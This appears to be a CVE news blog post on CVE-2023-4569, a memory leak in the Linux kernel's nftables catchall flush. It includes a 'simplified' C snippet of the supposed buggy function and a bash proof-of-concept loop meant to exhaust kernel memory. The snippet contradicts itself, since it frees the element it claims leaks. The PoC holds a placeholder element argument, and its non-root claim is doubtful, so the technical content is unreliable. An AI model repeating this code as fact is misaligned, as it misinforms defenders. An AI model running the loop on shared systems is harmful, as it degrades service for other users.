CVE CyberSecurity Database News

CVE-2023-4569 - Memory Leak Vulnerability in Linux Kernel nft_set_catchall_flush (with Simple Details and Exploit Example)

Poster -

---

Overview

In August 2023, a memory management flaw (CVE-2023-4569) was found in the Linux kernel, specifically in the Netfilter subsystem. This vulnerability could let a local attacker cause a memory leak in systems using nftables, Linux's firewall component, due to mishandling of catchall elements during table flushes.

In this post, we’ll break down what went wrong, how one could exploit the issue, and what you need to watch out for. We'll also share a simple code snippet and original research links for deeper reading.

What is Netfilter and nftables?

Netfilter is a packet filtering and manipulation framework in the Linux kernel. nftables is its modern interface, handling things like firewalls.

Admins manage network traffic rules using these tools, and every rule or match is an “element” in a “set.” Sometimes, a rule applies to any packet—that’s a catchall element.

Where is the Flaw?

The bug is in the kernel's nf_tables_api.c file, inside the function nft_set_catchall_flush. This function is supposed to clean up (flush) catchall rule elements from a set. But a logic error here causes the kernel to perform double deactivations: it deactivates the same element twice during cleanup. Normally, when you "deactivate" an element, it should be cleaned up and its memory freed. Deactivation twice, however, confuses the kernel's object management, causing a memory leak instead.

This doesn't let an attacker run code or crash the system, but it can gradually exhaust system memory—bad news for servers or multi-user systems.

Here’s a (simplified) version of the buggy logic

// net/netfilter/nf_tables_api.c
void nft_set_catchall_flush(struct nft_set *set)
{
    list_for_each_entry_safe(e, n, &set->catchall_list, list) {
        nft_deactivate_set_elem(e);      // First deactivation
        list_del(&e->list);
        nft_deactivate_set_elem(e);      // Oops! Deactivated again
        kfree(e);
    }
}

Explanation:

nft_deactivate_set_elem(e) should be called just once for each element.

- The duplicated call means after the first cleanup, the kernel loses track, so the element's memory isn't freed properly, leading to a leak.

Proof-of-Concept Exploit Example

Below is an example exploit: it repeatedly creates and flushes nftables sets with catchall elements. Run it as a local, non-root user in a container or VM, watching your memory usage grow.

Disclaimer: For research and defensive purposes only!

#!/bin/bash

for i in $(seq 1 100); do
  nft add table inet test$i
  nft add set inet test$i s$i '{ type ipv4_addr; flags interval; }'
  nft add element inet test$i s$i { .../ }
  nft flush set inet test$i s$i   # Triggers the bug
  nft delete set inet test$i s$i
  nft delete table inet test$i
done

What you'll see:
RAM usage of the kernel increases. If repeated enough, other processes face slowdowns or kernel 'OOM' (Out of Memory) errors.

Fix and Recommendations

Patch status:

Patch submitted upstream and backported to most major Linux kernel trees.

Fix commit:
- netfilter: nf_tables: fix memory leak when removing catchall elements

What to do:

References

- CVE-2023-4569 on NIST
- Red Hat Security Advisory
- Kernel Patch Discussion
- Official Patch Commit

Conclusion

CVE-2023-4569 isn’t a direct privilege escalation or code execution flaw, but it lets any local user quietly degrade system memory. On shared servers or multi-user environments, that's a serious risk.

If you use nftables, patch your kernel now!

Feel free to ask questions below or check the official references for more details.

Timeline

Published on: 08/28/2023 22:15:00 UTC
Last modified on: 09/10/2023 12:16:00 UTC